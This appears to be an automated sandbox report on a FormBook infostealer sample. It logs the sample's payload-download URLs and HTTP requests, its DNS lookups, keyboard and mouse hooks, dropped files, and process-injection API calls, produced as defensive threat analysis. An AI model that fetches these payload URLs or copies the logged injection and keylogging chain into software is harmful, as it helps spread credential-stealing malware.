Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive

Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: unknown

DNS traffic detected: queries for: fqe.short.gy

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Mon, 12 Apr 2021 05:47:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20

Source: vbc.exe	String found in binary or memory: http://103.141.138.118/bin_iOxAb78.bin
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.2187372005.0000000002CC0000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.2365850522.0000000000F70000.00000002.00000001.sdmp, icsys.icn.exe, 00000007.00000002.2187194391.0000000002C40000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2237647374.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000002.2236880993.0000000000901000.00000004.00000020.sdmp, explorer.exe, 00000008.00000002.2236780419.00000000008D8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000008.00000002.2236780419.00000000008D8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.giffi
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gif8X;E
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifr
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gif
Source: explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifr
Source: explorer.exe, 00000008.00000002.2236947753.0000000000927000.00000004.00000001.sdmp, explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp, explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000008.00000002.2236727117.0000000000894000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif.exe
Source: explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif4
Source: explorer.exe, 00000008.00000002.2236947753.0000000000927000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifuVwzFlRdVmuMSmtmQbIqqyE
Source: explorer.exe, 00000008.00000002.2236947753.0000000000927000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/filesoLgFqAfjBmuVwzFlRdVmuMSmtmQbIqqyE
Source: explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif)
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.2187372005.0000000002CC0000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.2365850522.0000000000F70000.00000002.00000001.sdmp, icsys.icn.exe, 00000007.00000002.2187194391.0000000002C40000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2237647374.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe	String found in binary or memory: https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443

Source: unknown

HTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49165 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\Public\vbc.exe	Windows user hook set: 3004 mouse C:\Windows\system32\MSVBVM60.DLL	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Windows user hook set: 1464 mouse C:\Windows\system32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\system\explorer.exe	Windows user hook set: 1688 mouse C:\Windows\system32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\system\explorer.exe	Windows user hook set: 0 keyboard low level c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\system\explorer.exe	Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Windows user hook set: 1900 mouse C:\Windows\system32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\system\svchost.exe	Windows user hook set: 620 mouse C:\Windows\system32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Windows user hook set: 1440 mouse C:\Windows\system32\MSVBVM60.DLL

Source: C:\Windows\system\explorer.exe

Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe

Jump to behavior

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\system\explorer.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\system\explorer.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\system\svchost.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\system\svchost.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\system\spoolsv.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D906B NtWriteVirtualMemory,LoadLibraryA,	5_2_003D906B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D99F7 NtProtectVirtualMemory,	5_2_003D99F7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D404F NtWriteVirtualMemory,	5_2_003D404F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3C4F NtWriteVirtualMemory,	5_2_003D3C4F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3C94 NtWriteVirtualMemory,	5_2_003D3C94
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3CD3 NtWriteVirtualMemory,	5_2_003D3CD3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3911 NtWriteVirtualMemory,	5_2_003D3911
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3166 NtWriteVirtualMemory,LoadLibraryA,	5_2_003D3166
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D395B NtWriteVirtualMemory,	5_2_003D395B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3D4D NtWriteVirtualMemory,	5_2_003D3D4D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3DEF NtWriteVirtualMemory,	5_2_003D3DEF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D39C3 NtWriteVirtualMemory,	5_2_003D39C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3A38 NtWriteVirtualMemory,	5_2_003D3A38
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D9A29 NtProtectVirtualMemory,	5_2_003D9A29
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3A05 NtWriteVirtualMemory,	5_2_003D3A05
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3E5F NtWriteVirtualMemory,	5_2_003D3E5F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3A51 NtWriteVirtualMemory,	5_2_003D3A51
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3EAF NtWriteVirtualMemory,	5_2_003D3EAF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3A9B NtWriteVirtualMemory,	5_2_003D3A9B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3AE7 NtWriteVirtualMemory,	5_2_003D3AE7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3F07 NtWriteVirtualMemory,	5_2_003D3F07
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3B57 NtWriteVirtualMemory,	5_2_003D3B57
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3B88 NtWriteVirtualMemory,	5_2_003D3B88
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3F88 NtWriteVirtualMemory,	5_2_003D3F88
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3BE9 NtWriteVirtualMemory,	5_2_003D3BE9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3FC8 NtWriteVirtualMemory,	5_2_003D3FC8
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E11E10 NtReadFile,	8_2_03E11E10
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E11D60 NtCreateFile,	8_2_03E11D60
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FEA0 NtReadVirtualMemory,LdrInitializeThunk,	18_2_1EB1FEA0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	18_2_1EB1FED0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FFB4 NtCreateSection,LdrInitializeThunk,	18_2_1EB1FFB4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FF34 NtQueueApcThread,LdrInitializeThunk,	18_2_1EB1FF34
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FC90 NtUnmapViewOfSection,LdrInitializeThunk,	18_2_1EB1FC90
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FC60 NtMapViewOfSection,LdrInitializeThunk,	18_2_1EB1FC60
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB21D80 NtSuspendThread,LdrInitializeThunk,	18_2_1EB21D80
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FD8C NtDelayExecution,LdrInitializeThunk,	18_2_1EB1FD8C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FDC0 NtQuerySystemInformation,LdrInitializeThunk,	18_2_1EB1FDC0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FAE8 NtQueryInformationProcess,LdrInitializeThunk,	18_2_1EB1FAE8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	18_2_1EB1FAD0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FBB8 NtQueryInformationToken,LdrInitializeThunk,	18_2_1EB1FBB8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FB68 NtFreeVirtualMemory,LdrInitializeThunk,	18_2_1EB1FB68
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB21930 NtSetContextThread,LdrInitializeThunk,	18_2_1EB21930
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1F900 NtReadFile,LdrInitializeThunk,	18_2_1EB1F900
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB200C4 NtCreateFile,LdrInitializeThunk,	18_2_1EB200C4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB20078 NtResumeThread,LdrInitializeThunk,	18_2_1EB20078
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB20048 NtProtectVirtualMemory,LdrInitializeThunk,	18_2_1EB20048
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FE24 NtWriteVirtualMemory,	18_2_1EB1FE24
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FFFC NtCreateProcessEx,	18_2_1EB1FFFC
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FC30 NtOpenProcess,	18_2_1EB1FC30
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB20C40 NtGetContextThread,	18_2_1EB20C40
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FC48 NtSetInformationFile,	18_2_1EB1FC48
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FD5C NtEnumerateKey,	18_2_1EB1FD5C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FAB8 NtQueryValueKey,	18_2_1EB1FAB8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FA20 NtQueryInformationFile,	18_2_1EB1FA20
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FA50 NtEnumerateValueKey,	18_2_1EB1FA50
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FBE8 NtQueryVirtualMemory,	18_2_1EB1FBE8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FB50 NtCreateKey,	18_2_1EB1FB50
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1F8CC NtWaitForSingleObject,	18_2_1EB1F8CC
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1F9F0 NtClose,	18_2_1EB1F9F0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1F938 NtWriteFile,	18_2_1EB1F938
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB207AC NtCreateMutant,	18_2_1EB207AC
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB210D0 NtOpenProcessToken,	18_2_1EB210D0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB20060 NtQuerySection,	18_2_1EB20060
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB201D4 NtSetValueKey,	18_2_1EB201D4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2010C NtOpenDirectoryObject,	18_2_1EB2010C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB21148 NtOpenThread,	18_2_1EB21148
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B99F7 NtProtectVirtualMemory,	18_2_001B99F7
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9F5D NtQueryInformationProcess,	18_2_001B9F5D
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA020 NtQueryInformationProcess,	18_2_001BA020
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA055 NtQueryInformationProcess,	18_2_001BA055
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA0A4 NtQueryInformationProcess,	18_2_001BA0A4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA113 NtQueryInformationProcess,	18_2_001BA113
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA14B NtQueryInformationProcess,	18_2_001BA14B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA189 NtQueryInformationProcess,	18_2_001BA189
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA1C3 NtQueryInformationProcess,	18_2_001BA1C3
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA1F4 NtQueryInformationProcess,	18_2_001BA1F4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA234 NtQueryInformationProcess,	18_2_001BA234
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9A29 NtProtectVirtualMemory,	18_2_001B9A29
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA27F NtQueryInformationProcess,	18_2_001BA27F
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA321 NtQueryInformationProcess,	18_2_001BA321
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA363 NtQueryInformationProcess,	18_2_001BA363
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA3D3 NtQueryInformationProcess,	18_2_001BA3D3
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9EB9 NtProtectVirtualMemory,	18_2_001B9EB9
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9F63 NtQueryInformationProcess,	18_2_001B9F63
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9FAF NtQueryInformationProcess,	18_2_001B9FAF
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9FE8 NtQueryInformationProcess,	18_2_001B9FE8

Source: C:\Users\user\AppData\Local\icsys.icn.exe

File created: c:\windows\system\explorer.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\icsys.icn.exe

File deleted: C:\Windows\system\explorer.exe

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041F830	4_2_0041F830
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00416130	4_2_00416130
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00422F50	4_2_00422F50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401A5C	5_2_00401A5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401AAC	5_2_00401AAC
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E14FA3	8_2_03E14FA3
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03DFAFB0	8_2_03DFAFB0
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E01E40	8_2_03E01E40
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E01E3B	8_2_03E01E3B
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03DFAD90	8_2_03DFAD90
